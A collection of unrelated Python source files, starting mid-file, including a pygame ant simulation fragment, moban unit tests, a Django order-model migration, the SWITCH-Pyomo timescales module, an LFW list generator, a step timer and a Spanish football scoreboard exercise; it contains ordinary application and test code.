if killNode in self.nodes:
del self.nodes[killNode]
if createNode is not None:
if createNode[0] > 0 and createNode[0] < self.width/self.node_size:
if createNode[1] > 0 and createNode[1] < self.height/self.node_size:
self.nodes[createNode] = 1
pygame.draw.rect(self.screen, self.pixel_color, (createNode[0]*self.node_size, createNode[1]*self.node_size, self.node_size, self.node_size))
def event(self, event):
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYUP:
if event.key == pygame.K_p:
self.paused = not self.paused
def render(self):
# draw ant at current position
pygame.draw.rect(self.screen, self.ant_color, (self.ant_x*self.node_size, self.ant_y*self.node_size, self.node_size, self.node_size))
pygame.display.flip()
def cleanup(self):
pygame.quit()
if __name__ == "__main__":
ant = Ant()
ant.init()
|
import unittest
from unittest.mock import patch
import fs.path
from moban.core.mobanfile.templates import handle_template
class TestHandleTemplateFunction(unittest.TestCase):
def setUp(self):
self.base_dir = [fs.path.join("tests", "fixtures")]
def test_copy_files(self):
results = list(
handle_template("copier-test01.csv", "/tmp/test", self.base_dir)
)
expected = [("copier-test01.csv", "/tmp/test", "csv")]
assert expected == results
@patch("moban.externals.reporter.report_error_message")
def test_file_not_found(self, reporter):
list(
handle_template(
"copier-test-not-found.csv", "/tmp/test", self.base_dir
)
)
reporter.assert_called_with(
"copier-test-not-found.csv cannot be found"
)
def test_listing_dir(self):
test_dir = "/tmp/copy-a-directory"
results = list(
handle_template("copier-directory", test_dir, self.base_dir)
)
expected = [
(
"copier-directory/level1-file1",
fs.path.join("/tmp/copy-a-directory", "level1-file1"),
None,
)
]
assert expected == results
def test_listing_dir_recusively(self):
test_dir = "/tmp/copy-a-directory"
results = list(
handle_template("copier-directory/**", test_dir, self.base_dir)
)
expected = [
(
fs.path.join("copier-directory", "copier-sample-dir", "file1"),
fs.path.join(
"/tmp/copy-a-directory", "copier-sample-dir", "file1"
),
None,
),
(
fs.path.join("copier-directory", "level1-file1"),
fs.path.join("/tmp/copy-a-directory", "level1-file1"),
None,
),
]
assert sorted(results, key=lambda x: x[0]) == sorted(
expected, key=lambda x: x[0]
)
@patch("moban.externals.reporter.report_error_message")
def test_listing_dir_recusively_with_error(self, reporter):
test_dir = "/tmp/copy-a-directory"
list(
handle_template(
"copier-directory-does-not-exist/**", test_dir, self.base_dir
)
)
assert reporter.call_count == 1
|
#!/usr/bin/env python3
from .baseController import *
"""
#################
# The Functions #
######################################
## Global file with all the functions.
######################################
"""
class BUFFALO(BaseController):
def defineController(self):
self.name = 'Buffalo controller'
|
# Generated by Django 3.0.5 on 2020-06-01 22:25
from decimal import Decimal
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique_order_id', models.CharField(blank=True, max_length=120, verbose_name='Order ID')),
('subtotal_amount', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=100, verbose_name='Subtotal Amount')),
('total_amount', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=100, verbose_name='Total Amount')),
('status', models.CharField(blank=True, choices=[('created', 'Created'), ('processing', 'Processing'), ('booked', 'Booked'), ('shipped', 'Shipped'), ('in_transit', 'In Transit'), ('delivered', 'Delivered'), ('refunded', 'Refunded'), ('cancelled', 'Cancelled'), ('declined', 'Declined'), ('unpaid', 'Unpaid'), ('paid', 'Paid')], max_length=50, verbose_name='Status')),
('active', models.BooleanField(blank=True, default=True, verbose_name='Active')),
('discount_code', models.CharField(blank=True, max_length=120, verbose_name='Discount Code')),
('commission_amount', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=120, verbose_name='Commission Amount')),
('ip_address', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP Address')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Order')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Order')),
],
options={
'verbose_name': 'Order',
'verbose_name_plural': 'Orders',
'ordering': ['-updated_at'],
},
),
migrations.CreateModel(
name='OrderShippingInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(blank=True, verbose_name='Description')),
('payment_method', models.CharField(blank=True, choices=[('cash', 'Cash'), ('credit_card', 'Credit Card'), ('bank_transfer', 'Bank Transfer')], default='cash', max_length=120, verbose_name='Payment Method')),
('shipping_company', models.CharField(blank=True, max_length=120, verbose_name='Shipping Company')),
('shipping_total', models.DecimalField(blank=True, decimal_places=2, default=Decimal('10'), max_digits=100, verbose_name='Shipping Total')),
('tracking_number', models.CharField(blank=True, max_length=120, verbose_name='Tracking Number')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Order Shipping Information')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Order Shipping Information')),
],
options={
'verbose_name': 'Order Shipping Information',
'verbose_name_plural': 'Order Shipping Information',
'ordering': ['-updated_at'],
},
),
migrations.CreateModel(
name='OrderShippingMovement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, verbose_name='Title')),
('subtitle', models.CharField(max_length=100, verbose_name='Subtitle (for status info)')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Order Shipping Movement')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Order Shipping Movement')),
],
options={
'verbose_name': 'Order Shipping Movement',
'verbose_name_plural': 'Order Shipping Movements',
'ordering': ['-updated_at'],
},
),
migrations.CreateModel(
name='ProductPurchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('unique_item_id', models.CharField(blank=True, max_length=120, verbose_name='Unique Item ID')),
('product_price', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=25, verbose_name='Product Price')),
('qty', models.IntegerField(default=1, verbose_name='Quantity')),
('line_total', models.DecimalField(blank=True, decimal_places=2, default=Decimal('0'), max_digits=100, verbose_name='Line Total')),
('refunded', models.BooleanField(default=False, verbose_name='Refunded')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Create date of Product Purchase')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Update date of Product Purchase')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.Order', verbose_name='Order')),
],
options={
'verbose_name': 'Product Purchase',
'verbose_name_plural': 'Product Purchases',
'ordering': ['-updated_at'],
},
),
]
|
# Copyright 2015 The Switch Authors. All rights reserved.
# Licensed under the Apache License, Version 2, which is in the LICENSE file.
"""
Defines timescales for investment and dispatch for the SWITCH-Pyomo model.
SYNOPSIS
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel('timescales')
>>> instance = model.load_inputs(inputs_dir='test_dat')
"""
import os
from pyomo.environ import *
hours_per_year = 8766
def define_components(mod):
"""
Augments a Pyomo abstract model object with sets and parameters that
describe timescales of investment and dispatch decisions.
PERIODS is the set of multi-year periods describing the timescale of
investment decisions. The following parameters describe attributes
of a period.
period_start[p]: The starting year of an investment period.
period_end[p]: The last year of an investment period.
period_length_years[p]: The number of years in an investment
period; derived from period_start and period_end.
period_length_hours[p]: The number of hours in an investment
period; derived from period_length_years with an average of 8766
hours per year.
TIMESERIES denote blocks of consecutive timepoints within a period.
An individual time series could represent a single day, a week, a
month or an entire year. This replaces the DATE construct in the old
SWITCH code and is meant to be more versatile. The following parameters
describe attributes of a timeseries.
ts_period[ts]: The period a timeseries falls in.
ts_num_tps[ts]: The number of timepoints in a timeseries.
ts_duration_of_tp[ts]: The duration in hours of each timepoint
within a timeseries. This is used for calculations that ensure a
storage project has a sufficient energy charge when it is
dedicated to providing reserves.
ts_duration_hrs[ts]: The total duration of a timeseries in hours.
= ts_duration_of_tp[ts] * ts_num_tps[ts]
ts_scale_to_period[ts]: The number of times this representative
timeseries is expected to occur in a period. Used as a scaling
factor to adjust the weight from ts_duration_hrs up to a period.
See examples below.
ts_scale_to_year[ts]: The number of times this representative
timeseries is expected to occur in a year.
TIMEPOINTS describe unique timepoints within a time series and
typically index exogenous variables such as electricity demand and
variable renewable energy output. The duration of a timepoint is
typically on the order of one or more hours, so costs associated
with timepoints are specified in hourly units, and the weights of
timepoints are specified in units of hours. TIMEPOINTS replaces the
HOURS construct in some of the old versions of SWITCH. The order of
timepoints is provided by their ordering in their input file
according to the standard Pyomo/AMPL conventions. To maintain
sanity, we recommend sorting your input file by timestamp. Each
timepoint within a series has the same duration to simplify
statistical calculations. The following parameters describe
attributes of timepoints.
tp_weight[t]: The weight of a timepoint within an investment
period in units of hours per period.
= ts_duration_of_tp[ts] * ts_scale_to_period[ts]
tp_weight_in_year[t]: The weight of a timepoint within a year
in units of hours per year.
= tp_weight[t] / period_length_years[p]
tp_timestamp[t]: The timestamp of the future time represented by
this timepoint. This is only used as a label and can follow any
format you wish. Although we highly advise populating this
parameter, it is optional and will default to t.
tp_ts[t]: This timepoint's timeseries.
tp_period[t]: This timepoint's period.
tp_duration_hrs[t]: The duration of this timepoint in hours,
taken directly from the timeseries specification ts_duration_of_tp.
tp_previous[t]: The timepoint that is previous to t in its
timeseries. Timeseries are treated circularly, so previous of the
first timepoint will be the last timepoint in the series instead of
being None or invalid. In the degenerate case of a timeseries with a
single timepoint, tp_previous[t] will be t.
PERIOD_TPS[period]: The set of timepoints in a period.
TS_TPS[timeseries]: The ordered set of timepoints in a timeseries.
Data validity check:
Currently, the sum of tp_weight for all timepoints in a period
must be within 1 percent of the expected length of the investment
period period. Period length is calculated by multiplying the
average number of hours in a year rounded to the nearest integer
(8766) by the number of years per period. I implemented this rule
because these are used as weights for variable costs of dispatch and
operations, and I think it is important for those costs to reflect
those expected costs over an entire period or else the levelized
costs of power that is being optimized will not make sense.
EXAMPLES
These hypothetical examples illustrate differential weighting of
timepoints and timeseries. Each timepoint adds additional
computational complexity, and you may wish to reduce the time
resolution in low-stress periods and increase the time resolution in
high-stress periods. These examples are probably not the resolutions
you would choose, but are meant to illustrate calculations. When
calculating these for your own models, you may check your
calculations by adding all of the tp_weights in a period and
ensuring that it is equal to the length of the period in years times
8766, the average number of hours per year. That weighting ensures
an accurate depiction of variable costs and dispatch relative to
fixed costs such as capital. This check is also performed when
loading a model and will generate an error if the sum of weights of
all timepoints in a period are more than 1 percent different than
the expected number of hours.
Example 1: The month of January is described by two timeseries: one
to represent a median load day (example 1) and one to represent a
peak day (example 2). In these examples, the timeseries for the
median load day has a much larger weight than the timeseries for the
peak load day.
January median timeseries: A timeseries describing a median day in
January is composed of 6 timepoints, each representing a 4-hour
block. This is scaled up by factor of 30 to represent all but 1 day
in January, then scaled up by a factor of 10 to represent all
Januaries in a 10-year period.
* ts_num_tps = 6 tp/ts
* ts_duration_of_tp = 4 hr/tp
* ts_duration_hrs = 24 hr/ts
= 6 tp/ts * 4 hr/tp
* ts_scale_to_period = 300 ts/period
= 1 ts/24 hr * 24 hr/day * 30 day/yr * 10 yr/period
24 hr/day is a conversion factor. 30 day/yr indicates this
timeseries is meant to represent 30 days out of every year. If
it represented every day in January instead of all but one day,
this term would be 31 day/hr.
* tp_weight[t] = 1200 hr/period
= 4 hr/tp * 1 tp/ts * 300 ts/period
January peak timeseries: This timeseries describing a peak day in
January is also composed of 6 timepoints, each representing a 4-hour
block. This is scaled up by factor of 1 to represent a single peak
day of the month January, then scaled up by a factor of 10 to
represent all peak January days in a 10-year period.
* ts_num_tps = 6 tp/ts
* ts_duration_of_tp = 4 hr/tp
* ts_duration_hrs = 24 hr/ts
= 6 tp/ts * 4 hr/tp
* ts_scale_to_period = 10 ts/period
= 1 ts/24 hr * 24 hr/day * 1 day/yr * 10 yr/period
24 hr/day is a conversion factor. 1 day/yr indicates this
timeseries is meant to represent a single day out of the year.
* tp_weight[t] = 40 hr/period
= 4 hr/tp * 1 tp/ts * 10 ts/period
Example 2: The month of July is described by one timeseries that
represents an entire week because July is a high-stress period for
the grid and needs more time resolution to capture capacity and
storage requirements.
This timeseries describing 7 days in July is composed of 84
timepoints, each representing 2 hour blocks. These are scaled up to
represent all 31 days of July, then scaled by another factor of 10
to represent a 10-year period.
* ts_num_tps = 84 tp/ts
* ts_duration_of_tp = 2 hr/tp
* ts_duration_hrs = 168 hr/ts
= 84 tp/ts * 2 hr/tp
* ts_scale_to_period = 44.29 ts/period
= 1 ts/168 hr * 24 hr/day * 31 days/yr * 10 yr/period
24 hr/day is a conversion factor. 31 day/yr indicates this
timeseries is meant to represent 31 days out of every year (31
days = duration of July).
* tp_weight[t] = 88.58 hr/period
= 2 hr/tp * 1 tp/ts * 44.29 ts/period
Example 3: The windy season of March & April are described with a
single timeseries spanning 3 days because this is a low-stress
period on the grid with surplus wind power and frequent
curtailments.
This timeseries describing 3 days in Spring is composted of 72
timepoints, each representing 1 hour. The timeseries is scaled up by
a factor of 21.3 to represent the 61 days of March and April, then
scaled by another factor of 10 to represent a 10-year period.
* ts_num_tps = 72 tp/ts
* ts_duration_of_tp = 1 hr/tp
* ts_duration_hrs = 72 hr/ts
= 72 tp/ts * 1 hr/tp
* ts_scale_to_period = 203.3 ts/period
= 1 ts/72 hr * 24 hr/day * 61 days/yr * 10 yr/period
24 hr/day is a conversion factor. 6a day/yr indicates this
timeseries is meant to represent 61 days out of every year (31
days in March + 30 days in April).
* tp_weight[t] = 203.3 hr/period
= 1 hr/tp * 1 tp/ts * 203.3 ts/period
EXAMPLE
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel('timescales')
>>> instance = model.create('test_dat/timescales.dat')
>>> instance = model.create('test_dat/timescales_bad_weights.dat')
Traceback (most recent call last):
...
ValueError: BuildCheck 'validate_time_weights' identified error with index '2020'
"""
mod.PERIODS = Set(ordered=True)
mod.period_start = Param(mod.PERIODS, within=PositiveReals)
mod.period_end = Param(mod.PERIODS, within=PositiveReals)
mod.min_data_check('PERIODS', 'period_start', 'period_end')
mod.period_length_years = Param(
mod.PERIODS,
initialize=lambda m, p: m.period_end[p] - m.period_start[p] + 1)
mod.period_length_hours = Param(
mod.PERIODS,
initialize=lambda m, p: m.period_length_years[p] * hours_per_year)
mod.TIMESERIES = Set(ordered=True)
mod.ts_period = Param(mod.TIMESERIES, within=mod.PERIODS)
mod.ts_duration_of_tp = Param(mod.TIMESERIES, within=PositiveReals)
mod.ts_num_tps = Param(mod.TIMESERIES, within=PositiveIntegers)
mod.ts_scale_to_period = Param(mod.TIMESERIES, within=PositiveReals)
mod.min_data_check(
'TIMESERIES', 'ts_period', 'ts_duration_of_tp', 'ts_num_tps',
'ts_scale_to_period')
mod.ts_scale_to_year = Param(
mod.TIMESERIES,
initialize=lambda m, ts: (
m.ts_scale_to_period[ts] / m.period_length_years[m.ts_period[ts]]))
mod.ts_duration_hrs = Param(
mod.TIMESERIES,
initialize=lambda m, ts: (
m.ts_num_tps[ts] * m.ts_duration_of_tp[ts]))
mod.TIMEPOINTS = Set(ordered=True)
mod.tp_ts = Param(mod.TIMEPOINTS, within=mod.TIMESERIES)
mod.min_data_check('TIMEPOINTS', 'tp_ts')
mod.tp_timestamp = Param(mod.TIMEPOINTS, default=lambda m, t: t)
mod.tp_period = Param(
mod.TIMEPOINTS,
within=mod.PERIODS,
initialize=lambda m, t: m.ts_period[m.tp_ts[t]])
mod.tp_weight = Param(
mod.TIMEPOINTS,
within=PositiveReals,
initialize=lambda m, t: (
m.ts_duration_of_tp[m.tp_ts[t]] *
m.ts_scale_to_period[m.tp_ts[t]]))
mod.tp_weight_in_year = Param(
mod.TIMEPOINTS,
within=PositiveReals,
initialize=lambda m, t: (
m.tp_weight[t] / m.period_length_years[m.tp_period[t]]))
mod.tp_duration_hrs = Param(
mod.TIMEPOINTS,
initialize=lambda m, t: m.ts_duration_of_tp[m.tp_ts[t]])
############################################################
# Helper sets indexed for convenient look-up.
# I didn't use filter because it isn't implemented for indexed sets.
mod.TS_TPS = Set(
mod.TIMESERIES,
ordered=True,
within=mod.TIMEPOINTS,
initialize=lambda m, ts: [
t for t in m.TIMEPOINTS if m.tp_ts[t] == ts])
mod.PERIOD_TPS = Set(
mod.PERIODS,
ordered=True,
within=mod.TIMEPOINTS,
initialize=lambda m, p: [
t for t in m.TIMEPOINTS if m.tp_period[t] == p])
# This next parameter is responsible for making timeseries either
# linear or circular. It is necessary for tracking unit committment
# as well as energy in storage. The prevw(x) method of an ordered
# set returns the set element that comes before x in the set,
# wrapping back to the last element of the set if x is the first
# element.
mod.tp_previous = Param(
mod.TIMEPOINTS,
within=mod.TIMEPOINTS,
initialize=lambda m, t: m.TS_TPS[m.tp_ts[t]].prevw(t))
def validate_time_weights_rule(m, p):
hours_in_period = sum(m.tp_weight[t] for t in m.PERIOD_TPS[p])
tol = 0.01
if(hours_in_period > (1 + tol) * m.period_length_hours[p] or
hours_in_period < (1 - tol) * m.period_length_hours[p]):
print ("validate_time_weights_rule failed for period " +
"'{period:.0f}'. Expected {period_h:0.2f}, based on " +
"length in years, but the sum of timepoint weights " +
"is {ds_h:0.2f}.\n"
).format(period=p, period_h=m.period_length_hours[p],
ds_h=hours_in_period)
return 0
return 1
mod.validate_time_weights = BuildCheck(
mod.PERIODS,
rule=validate_time_weights_rule)
def load_inputs(mod, switch_data, inputs_dir):
"""
Import data for timescales from .tab files. The inputs_dir
should contain the following files with these columns. The
columns may be in any order and extra columns will be ignored.
periods.tab
INVESTMENT_PERIOD, period_start, period_end
timeseries.tab
TIMESERIES, period, ts_duration_of_tp, ts_num_tps,
ts_scale_to_period
The order of rows in timepoints.tab indicates the order of the
timepoints per Pyomo and AMPL convention. To maintain your sanity,
we highly recommend that you sort your input file chronologically by
timestamp. Note: timestamp is solely used as a label and be in any
format.
timepoints.tab
timepoint_id, timestamp, timeseries
EXAMPLE:
>>> from switch_mod.utilities import define_AbstractModel
>>> model = define_AbstractModel('timescales')
>>> instance = model.load_inputs(inputs_dir='test_dat')
>>> instance.tp_weight_in_year.pprint()
tp_weight_in_year : Size=7, Index=TIMEPOINTS, Domain=PositiveReals, Default=None, Mutable=False
Key : Value
1 : 1095.744
2 : 1095.744
3 : 1095.744
4 : 1095.744
5 : 2191.5
6 : 2191.5
7 : 8766.0
"""
# Include select in each load() function so that it will check out column
# names, be indifferent to column order, and throw an error message if
# some columns are not found.
switch_data.load_aug(
filename=os.path.join(inputs_dir, 'periods.tab'),
select=('INVESTMENT_PERIOD', 'period_start', 'period_end'),
index=mod.PERIODS,
param=(mod.period_start, mod.period_end))
switch_data.load_aug(
filename=os.path.join(inputs_dir, 'timeseries.tab'),
select=('TIMESERIES', 'ts_period', 'ts_duration_of_tp',
'ts_num_tps', 'ts_scale_to_period'),
index=mod.TIMESERIES,
param=(mod.ts_period, mod.ts_duration_of_tp,
mod.ts_num_tps, mod.ts_scale_to_period))
switch_data.load_aug(
filename=os.path.join(inputs_dir, 'timepoints.tab'),
select=('timepoint_id', 'timestamp', 'timeseries'),
index=mod.TIMEPOINTS,
param=(mod.tp_timestamp, mod.tp_ts))
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Generate test lists"""
import scipy.io as io
import numpy as np
f1 = 'image_list_for_lfw.txt'
mat_lfw = io.loadmat('LightenedCNN_B_lfw.mat')
lfw_path_list = mat_lfw['image_path']
lfw_path_list = np.transpose(lfw_path_list)
lfw_label_list = mat_lfw['labels_original']
lfw_label_list = np.transpose(lfw_label_list)
for idx, ele in enumerate(lfw_path_list):
print(ele[0][0][10:], lfw_label_list[idx][0][0])
with open(f1, 'a') as f:
line = ele[0][0][10:] + ' ' + lfw_label_list[idx][0][0]
f.write(line + '\n')
f2 = 'image_list_for_blufr.txt'
mat_blufr = io.loadmat('BLUFR/config/lfw/blufr_lfw_config.mat')
blufr_path_list = mat_blufr['imageList']
for _, ele in enumerate(blufr_path_list):
print(ele[0][0])
with open(f2, 'a') as f:
f.write(ele[0][0] + '\n')
|
import time
import logging
logger = logging.getLogger(__name__)
class Steps:
fstep = 0
lstep = -1
times = []
tags = []
def __init__(self, fs = 0, ls=1000):
self.fstep = fs
self.lstep = ls
def isstep(self, step, tag=""):
if self.lstep >= step >= self.fstep:
new_time = time.time()
self.times.append(new_time)
self.tags.append(tag)
logger.debug("Starting step %s (%s)" % (step,tag))
if len(self.times) > 1:
step_time = new_time - self.times[-2]
logger.debug("Previous step (%s) took %s seconds" % (self.tags[-2],step_time))
return True
else:
logger.debug("Skipping step %s (%s)" % (step,tag))
return False
def endsteps(self):
self.times.append(time.time())
def __get_total_time_string(self, init, end):
total_secs = end - init
total_hours = total_secs / 60.0 / 60.0
total_days = total_hours / 24.0
tts = "Total time=%s secs. - %s hours. - %s days" % (total_secs, total_hours, total_days)
return tts
def get_print_times(self):
time_string = "--- TIMES ----\n"
time_string = time_string + str(self.times) + "\n-----------\n"
for (i,t) in enumerate(self.times[1:]):
time_lapse = t - self.times[i]
ts = "%s) Step %s (%s) took=%s secs." % (i, (self.fstep+i), self.tags[i],time_lapse)
time_string = time_string + ts + "\n"
tts = self.__get_total_time_string(self.times[0],self.times[-1])
time_string = time_string + tts + "\n"
time_string = time_string + "-----------\n"
return time_string
|
# -*- coding: utf-8 -*-
"""
Created by zejiran.
"""
def cargar_tablero_goles(ruta_archivo: str) -> list:
"""
Esta función carga la información de un tablero de goles
a partir de un archivo CSV.
La primera fila del archivo contiene la dimensión del tablero (cuadrado).
Parámetros:
ruta_archivo (str): la ruta del archivo que se quiere cargar.
Retorno: list
La matriz con el tablero de goles.
"""
archivo = open(ruta_archivo)
dimensiones = archivo.readline().split(",")
filas = int(dimensiones[0])
columnas = filas
tablero = []
for i in range(0, filas):
tablero.append([0] * columnas)
linea = archivo.readline()
i = 0
while len(linea) > 0:
datos = linea.split(",")
for j in range(0, columnas):
tablero[i][j] = int(datos[j])
i += 1
linea = archivo.readline()
archivo.close()
return tablero
def cargar_equipos(ruta_archivo: str) -> dict:
"""
Esta función carga la información de los equipos
a partir de un archivo CSV.
Parámetros:
ruta_archivo (str): la ruta del archivo que se quiere cargar
Retorno: dict
Un diccionario en el cual las llaves son los nombres de los equipos y
los valores son unos índices consecutivos.
"""
archivo = open(ruta_archivo)
equipos = {}
linea = archivo.readline()
while len(linea) > 0:
datos = linea.split(",")
equipos[datos[0]] = int(datos[1])
linea = archivo.readline()
archivo.close()
return equipos
def anotar_marcador(tablero_goles: list, equipos: dict, equipo1: str, equipo2: str, marcador: str) -> list:
"""
Esta función registra el marcador de un partido en el tablero de goles.
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles.
equipos (dict): diccionario de los equipos del campeonato.
equipo1 (string): nombre del primer equipo del partido.
equipo2 (string): nombre del segundo equipo del partido.
marcador (string): string con formato goles1-goles2, donde goles1 son los goles que equipo1
marcó a equipo2 y goles2 son los goles que equipo2 marcó a equipo1.
Retorno: list
La matriz de goles actualizada.
"""
pos_equipo1 = int(equipos.get(equipo1))
pos_equipo2 = int(equipos.get(equipo2))
marcador = marcador.split("-")
tablero_goles[pos_equipo1][pos_equipo2] = int(marcador[0])
tablero_goles[pos_equipo2][pos_equipo1] = int(marcador[1])
return tablero_goles
def total_goles(tablero_goles: list) -> int:
"""
Esta función calcula el total de goles que se han marcado en el campeonato.
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles.
Retorno: int
El total de goles de la matriz.
"""
goles_totales = 0
for fila in tablero_goles:
for columna in fila:
if columna != -1 and columna != -2:
goles_totales += int(columna)
return goles_totales
def partidos_jugados(tablero_goles: list) -> int:
"""
Esta función calcula el total de partidos que se han jugado en el campeonato.
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles.
Retorno: int
El total de partidos jugados en el campeonato.
"""
jugados = 0
for fila in tablero_goles:
for columna in fila:
if columna != -1 and columna != -2:
jugados += 0.5
return int(jugados)
def equipo_mas_goleador(tablero_goles: list, equipos: dict) -> str:
"""
Esta función retorna el nombre del equipo que ha marcado más goles en el
campeonato
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles
equipos (dict): diccionario de los equipos del campeonato
Retorno: str
El nombre del equipo más goleador del campeonato
"""
goleador = "Ninguno"
goles_goleador = 0
nombre_equipos = []
# Agregar equipos a una lista.
for equipo in equipos:
nombre_equipos.append(equipo)
# Recorrido para verificar goleador.
i = 0
for fila in tablero_goles:
goles_equipo = 0
for columna in fila:
if columna != -1 and columna != -2:
goles_equipo += columna
if goles_goleador < goles_equipo:
goles_goleador = goles_equipo
goleador = nombre_equipos[i]
i += 1
return goleador
def equipo_mas_goleado(tablero_goles: list, equipos: dict) -> str:
"""
Esta función retorna el nombre del equipo al cual le han marcado más goles en el
campeonato
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles
equipos (dict): diccionario de los equipos del campeonato
Retorno: str
El nombre del equipo más goleado del campeonato
"""
goleado = "Ninguno"
nombre_equipos = list(equipos.keys())
goles_goleado = 0
# Recorrido para verificar goleador.
i = 0
while i < len(tablero_goles):
goles = 0
j = 0
while j < len(tablero_goles):
if tablero_goles[j][i] != -1 and tablero_goles[j][i] != -2:
goles += tablero_goles[j][i]
j += 1
if goles_goleado < goles:
goles_goleado = goles
goleado = nombre_equipos[i]
i += 1
return goleado
def partidos_empatados(tablero_goles: list) -> int:
"""
Esta función calcula el total de partidos que se han quedado empatados en el campeonato
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles
Retorno: int
El total de partidos empatados en el campeonato
"""
tied = 0
for i in range(0, len(tablero_goles)):
for j in range(i + 1, len(tablero_goles[0])):
if tablero_goles[i][j] == tablero_goles[j][i] and tablero_goles[j][i] >= 0:
tied += 1
return tied
def mayor_numero_goles(tablero_goles: list) -> int:
"""
Esta función calcula el mayor número de goles marcados en un partido del campeonato
(sumando los goles de los dos equipos)
Parámetros:
tablero_goles (list): matriz que contiene el tablero de goles
Retorno: int
El mayor número de goles marcados en un partido del campeonato
"""
maximo_goles = 0
for i in range(0, len(tablero_goles)):
for j in range(i + 1, len(tablero_goles[0])):
total_goles_actual = tablero_goles[i][j] + tablero_goles[j][i]
if total_goles_actual > maximo_goles:
maximo_goles = total_goles_actual
return maximo_goles
def is_goleada(tabla_goles: list) -> bool:
it_is = False
i = 0
while i < len(tabla_goles) and not it_is:
j = i + 1
while j < len(tabla_goles[0]) and not it_is:
diference = abs(tabla_goles[i][j] - tabla_goles[j][i])
if diference >= 3:
it_is = True
j += 1
i += 1
return it_is
|
#!/usr/bin/env python3
#****************************************************************************************************************************************************
# Copyright (c) 2014 Freescale Semiconductor, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the Freescale Semiconductor, Inc. nor the names of
# its contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#****************************************************************************************************************************************************
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Union
import os
import os.path
from FslBuildGen import IOUtil
from FslBuildGen import Util
from FslBuildGen.BasicConfig import BasicConfig
from FslBuildGen.DataTypes import CompilerNames
from FslBuildGen.DataTypes import MagicStrings
from FslBuildGen.DataTypes import PackageRequirementTypeString
from FslBuildGen.DataTypes import VisualStudioVersion
from FslBuildGen.Exceptions import DuplicatedConfigContentBuilder
from FslBuildGen.Exceptions import DuplicatedConfigPackageLocation
from FslBuildGen.Exceptions import DuplicatedConfigRootPath
from FslBuildGen.Exceptions import DuplicatedNewProjectTemplatesRootPath
from FslBuildGen.Exceptions import UsageErrorException
from FslBuildGen.ToolConfigExperimental import ToolConfigExperimental
from FslBuildGen.ToolConfigRootDirectory import ToolConfigRootDirectory
from FslBuildGen.Vars.VariableProcessor import VariableProcessor
from FslBuildGen.Xml.Exceptions import XmlException2
from FslBuildGen.Xml.Exceptions import XmlDuplicatedCompilerConfigurationException
from FslBuildGen.Xml.Exceptions import XmlUnsupportedCompilerVersionException
from FslBuildGen.Xml.ToolConfig.XmlConfigFileAddNewProjectTemplatesRootDirectory import XmlConfigFileAddNewProjectTemplatesRootDirectory
